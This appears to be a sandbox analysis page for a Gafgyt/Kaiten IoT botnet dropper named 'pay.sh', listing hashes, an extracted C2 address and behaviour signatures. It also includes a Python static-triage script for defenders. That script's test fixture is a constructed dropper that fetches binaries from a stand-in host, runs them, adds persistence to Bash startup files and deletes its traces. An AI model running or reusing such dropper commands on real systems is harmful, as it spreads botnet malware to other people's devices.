General

  • Target

    pay.sh

  • Size

    3KB

  • Sample

    241022-tnksqatdje

  • MD5

    cf70ee36f1e9247f2146e4981924d4f4

  • SHA1

    7eabae4200118c4e89979658db6e4d905fe3dae9

  • SHA256

    0076fe37f41ee52f12cf76c5bbbc5eb726ce534ec6da22c358499bb948d17b6c

  • SHA512

    60f6bdf8813ee328f747b722e8d8abb8ecd91836a96de7e877217c6794d4dcef56130f3f833f748637b0a7b81bac94ea7e3d9cb3dfff0a2060eab34c20070bd0

Malware Config

Extracted

Family

gafgyt

C2

104.234.24.138:1990

Targets

    • Target

      pay.sh

    • Size

      3KB

    • MD5

      cf70ee36f1e9247f2146e4981924d4f4

    • SHA1

      7eabae4200118c4e89979658db6e4d905fe3dae9

    • SHA256

      0076fe37f41ee52f12cf76c5bbbc5eb726ce534ec6da22c358499bb948d17b6c

    • SHA512

      60f6bdf8813ee328f747b722e8d8abb8ecd91836a96de7e877217c6794d4dcef56130f3f833f748637b0a7b81bac94ea7e3d9cb3dfff0a2060eab34c20070bd0

    • Detected Gafgyt variant

    • Detects Kaiten/Tsunami Payload

    • Detects Kaiten/Tsunami payload

    • Gafgyt/Bashlite

      IoT botnet with numerous variants first seen in 2014.

    • Kaiten/Tsunami

      Linux-based IoT botnet that is controlled over IRC and is normally used to carry out DDoS attacks.

    • File and Directory Permissions Modification

      Adversaries may modify file or directory permissions to evade defenses.

    • Executes dropped EXE

    • Creates/modifies environment variables

      Creating/modifying environment variables is a common persistence mechanism.

    • Modifies Bash startup script
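
    The four behavioural signatures above (permission change on dropped files, execution of dropped files, environment-variable persistence, Bash startup script modification) are exactly what a static pass over a small shell dropper like this one can pre-screen before detonation. The script below is an added example written for this page, not code from the sandbox or from the sample; the dropper text it parses is a constructed stand-in (192.0.2.10 is a TEST-NET address, bot.arm/bot.mips are placeholder names), not the analysed pay.sh, and the function and signature names are the example's own.

```python
"""Static triage of a Gafgyt-style shell dropper (added example, not page code).

Flags the behaviours the sandbox signatures describe and lists hard-coded
IPv4 endpoints (download hosts or candidate C2) found in the script.
"""
import re
from dataclasses import dataclass, field

# Constructed stand-in for a multi-arch IoT dropper. NOT the analysed pay.sh;
# 192.0.2.10 is a TEST-NET address and bot.* are placeholder file names.
SAMPLE_DROPPER = """#!/bin/sh
cd /tmp || cd /var/run || cd /dev/shm
wget http://192.0.2.10/bins/bot.arm -O bot.arm; chmod 777 bot.arm; ./bot.arm payload
wget http://192.0.2.10:8080/bins/bot.mips
chmod +x *
sh bot.mips
export PATH=/tmp:$PATH
echo 'export HOME=/tmp' >> ~/.bashrc
echo "/tmp/bot.arm" >> /etc/profile
rm -rf bot.arm bot.mips
"""

BASH_STARTUP = (".bashrc", ".bash_profile", ".profile", "/etc/profile", "/etc/bash.bashrc")
URL_RE = re.compile(r"(?:https?|ftp|tftp)://[^\s'\"]+")
IPV4_RE = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3})(?::(\d{1,5}))?")
EXPORT_RE = re.compile(r"\bexport\s+([A-Za-z_]\w*)=")
REDIRECT_RE = re.compile(r">>?\s*(\S+)")


@dataclass
class TriageResult:
    dropped: set = field(default_factory=set)           # files written by wget/curl/tftp
    chmod_dropped: set = field(default_factory=set)     # dropped files whose mode was changed
    executed_dropped: set = field(default_factory=set)  # dropped files that were run
    env_vars: set = field(default_factory=set)          # names passed to `export`
    startup_files: set = field(default_factory=set)     # Bash startup files written to
    ip_endpoints: set = field(default_factory=set)      # hard-coded IPv4 or IPv4:port


def _commands(script):
    """Split a script into simple commands on newlines, ';', '&&', '||' and '|'."""
    out = []
    for line in script.splitlines():
        line = line.split("#", 1)[0]  # drops comments and the shebang line
        for cmd in re.split(r"\s*(?:;|&&|\|\||\|)\s*", line):
            if cmd.strip():
                out.append(cmd.strip())
    return out


def _dropped_name(tokens):
    """Basename of the file a wget/curl/tftp command writes, or None."""
    if tokens[0] not in ("wget", "curl", "tftp"):
        return None
    for flag, value in zip(tokens, tokens[1:]):
        if flag in ("-O", "-o", "-r"):  # wget -O, curl -o, tftp -g -r
            return value.split("/")[-1]
    m = URL_RE.search(" ".join(tokens))  # no explicit output: wget keeps the URL basename
    return m.group(0).rstrip("/").split("/")[-1] if m else None


def _chmod_targets(tokens):
    args = [t for t in tokens[1:] if not t.startswith("-")]  # skip -R and similar flags
    return {a.split("/")[-1] for a in args[1:]}               # args[0] is the mode


def triage(script):
    r = TriageResult()
    for cmd in _commands(script):
        tokens = cmd.split()
        name = _dropped_name(tokens)
        if name:
            r.dropped.add(name)
        if tokens[0] == "chmod":
            targets = _chmod_targets(tokens)
            r.chmod_dropped |= r.dropped if "*" in targets else targets & r.dropped
        # execution either by path (./x, /tmp/x) or through an interpreter (sh x)
        via_interp = tokens[0] in ("sh", "bash") and len(tokens) > 1
        target = tokens[1] if via_interp else tokens[0]
        if (via_interp or "/" in target) and target.split("/")[-1] in r.dropped:
            r.executed_dropped.add(target.split("/")[-1])
        r.env_vars.update(EXPORT_RE.findall(cmd))
        m = REDIRECT_RE.search(cmd)
        if m and m.group(1).endswith(BASH_STARTUP):
            r.startup_files.add(m.group(1))
    for ip, port in IPV4_RE.findall(script):
        r.ip_endpoints.add(f"{ip}:{port}" if port else ip)
    return r


# Signature names mirror the sandbox report; the mapping itself is this example's.
SIGNATURES = {
    "File and Directory Permissions Modification": lambda r: bool(r.chmod_dropped),
    "Executes dropped EXE": lambda r: bool(r.executed_dropped),
    "Creates/modifies environment variables": lambda r: bool(r.env_vars),
    "Modifies Bash startup script": lambda r: bool(r.startup_files),
}


def behaviours(result):
    """Names of the signatures the static pass supports for this script."""
    return {name for name, hit in SIGNATURES.items() if hit(result)}


if __name__ == "__main__":
    res = triage(SAMPLE_DROPPER)
    print(sorted(behaviours(res)), sorted(res.ip_endpoints))
```

    This is a pre-screen, not a replacement for detonation: a dropper that builds its commands with base64, eval, or busybox wrappers, or that pulls the payload over a raw socket, will slip past the regexes, which is why the dynamic signatures in the report remain the authoritative verdict. The IPv4 list is also only the download infrastructure visible in the script; the C2 endpoint listed under Malware Config is recovered from the downloaded payload's configuration, not necessarily from the script itself.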

MITRE ATT&CK Enterprise v15
